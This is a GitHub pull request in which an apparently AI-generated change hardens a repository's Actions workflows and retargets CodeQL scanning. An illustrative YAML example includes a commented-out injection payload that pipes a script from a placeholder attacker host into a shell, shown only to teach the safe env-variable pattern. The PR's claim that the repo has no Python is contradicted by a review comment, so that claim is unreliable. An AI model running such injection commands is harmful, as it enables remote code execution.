
ci: harden github workflows with least-privilege permissions and timeouts#14

Merged
OgeonX-Ai merged 1 commit into main from fix/cas-workstation-workflow-hardening on Jul 3, 2026

Conversation

@OgeonX-Ai

Contributor

Summary

Hardens this repo's GitHub Actions workflows. Workflow YAML only — no PowerShell scripts or quality-gate logic were touched.

CodeQL decision + rationale

codeql.yml previously set the analysis matrix to language: [ 'python' ], but this repo contains no Python — it is PowerShell + JSON. CodeQL has no PowerShell analyzer, so a python run analyzed nothing and effectively wasted CI while giving a false sense of security coverage.

Decision: switch the matrix to language: [ 'actions' ] rather than deleting the workflow. CodeQL's actions pack scans GitHub Actions workflow files for real issues (e.g. injection via untrusted ${{ github.event.* }}, over-broad pull_request_target usage, unpinned/dangerous action patterns). This repo has five workflows worth scanning, one of which (pr-lint.yml) uses pull_request_target, so actions analysis adds genuine value. Keeping the workflow (retargeted) is strictly better than removing it.

Per-file changes

File | permissions | timeout-minutes
codeql.yml | added top-level contents: read (job-level already scoped: actions: read, contents: read, security-events: write) + matrix python → actions | added 15 on analyze
pages.yml | already least-privilege (contents: read, pages: write, id-token: write) — unchanged | added 10 on build and deploy
pr-lint.yml | added top-level contents: read, pull-requests: read | added 10 on main
stale.yml | added top-level contents: read, issues: write, pull-requests: write | added 10 on stale
quality.yml | already hardened (contents: read + per-step/job timeouts) — unchanged | already 20

Validation

All five workflow files parse cleanly via yaml.safe_load (PyYAML). No syntax regressions.

🤖 Generated with Claude Code

…outs

Scope: workflow YAML hardening only; no PowerShell or quality-logic changes.

- codeql.yml: switch analysis matrix from 'python' (repo has no Python;
  CodeQL cannot analyze PowerShell) to 'actions' so the workflows
  themselves are scanned; add top-level contents:read and a 15m job
  timeout.
- pages.yml: add 10m timeouts to build and deploy jobs (top-level
  permissions already least-privilege).
- pr-lint.yml: add top-level permissions (contents:read,
  pull-requests:read) and a 10m job timeout.
- stale.yml: add top-level permissions (contents:read, issues:write,
  pull-requests:write) and a 10m job timeout.
- quality.yml: already hardened; unchanged.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
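The PR description singles out pr-lint.yml because it runs on pull_request_target, the trigger where a least-privilege permissions block and safe handling of untrusted event data matter most. The workflow below is an added illustration written for this page, not the repository's actual pr-lint.yml: the file contents, the job name, the step name and the title regex are assumptions. It shows the top-level permissions and job timeout from the PR alongside the injection pattern the CodeQL actions pack is meant to catch, with the unsafe form left commented out beside the safe one.

```yaml
# Added example (not the project's own pr-lint.yml). Job/step names, the
# conventional-commit regex and the trigger types are assumptions.
name: pr-lint

on:
  pull_request_target:
    types: [opened, edited, synchronize]

# A top-level default applies to every job. Without it, a pull_request_target
# run gets a read/write GITHUB_TOKEN plus repository secrets, while executing
# on behalf of an untrusted PR.
permissions:
  contents: read
  pull-requests: read

jobs:
  main:
    runs-on: ubuntu-latest
    timeout-minutes: 10          # bound runaway or hung runs
    steps:
      # Checks out the base branch (the default for pull_request_target).
      # Never check out github.event.pull_request.head.sha here: that runs
      # the PR author's code with the trusted token and secrets.
      - uses: actions/checkout@v4   # pin to a full commit SHA in real use

      # UNSAFE pattern (kept commented out): the attacker-controlled title is
      # expanded into the shell script before bash parses it, so a title such
      # as   "; curl https://attacker.example/x | sh; echo "   executes.
      # - run: echo "Title: ${{ github.event.pull_request.title }}"

      # SAFE pattern: hand the untrusted value to the step as an environment
      # variable. The expansion happens in the env block, and bash only ever
      # sees $PR_TITLE as data, never as script text.
      - name: lint-pr-title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          if ! printf '%s' "$PR_TITLE" | grep -Eq '^(feat|fix|ci|docs|chore)(\(.+\))?: '; then
            echo "::error::PR title must follow conventional-commit format"
            exit 1
          fi
```

The same two changes (a top-level `permissions:` block and `timeout-minutes:` on each job) are what the per-file table above records for stale.yml and codeql.yml; the env-variable indirection is the part that a permissions block alone does not buy you, and it is the kind of finding `language: [ 'actions' ]` reports.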
@github-advanced-security


You are seeing this message because GitHub Code Scanning has recently been set up for this repository, or this pull request contains the workflow file for the Code Scanning tool.

What Enabling Code Scanning Means:

  • The 'Security' tab will display more code scanning analysis results (e.g., for the default branch).
  • Depending on your configuration and choice of analysis tool, future pull requests will be annotated with code scanning analysis results.
  • You will be able to see the analysis results for the pull request's branch on this overview once the scans have completed and the checks have passed.

For more information about GitHub Code Scanning, check out the documentation.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment



💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 34c098df1f


fail-fast: false
matrix:
language: [ 'python' ]
language: [ 'actions' ]
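Review bot: replacing `'python'` with `'actions'` in this matrix removes Python code scanning instead of adding workflow scanning beside it; the Codex comment below notes that scripts/validate_json_schema.py is still invoked from scripts/Test-CasJsonSchema.ps1, so that file would go uncovered on every push and PR. Since `fail-fast: false` is already set, the two analyzers can run as independent matrix entries without one cancelling the other: `language: [ 'python', 'actions' ]`.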


P2: Keep Python in the CodeQL matrix

This replaces the existing Python CodeQL job instead of adding Actions scanning alongside it. The repo still has executable Python code (scripts/validate_json_schema.py) that is invoked by scripts/Test-CasJsonSchema.ps1:11 and :33, so after this change CodeQL will only analyze workflow YAML and the Python validator loses code-scanning coverage on every push/PR. Include both python and actions in the matrix if the goal is to harden workflows without dropping existing coverage.


@OgeonX-Ai OgeonX-Ai merged commit e2d0905 into main Jul 3, 2026
4 checks passed
@OgeonX-Ai OgeonX-Ai deleted the fix/cas-workstation-workflow-hardening branch July 3, 2026 16:39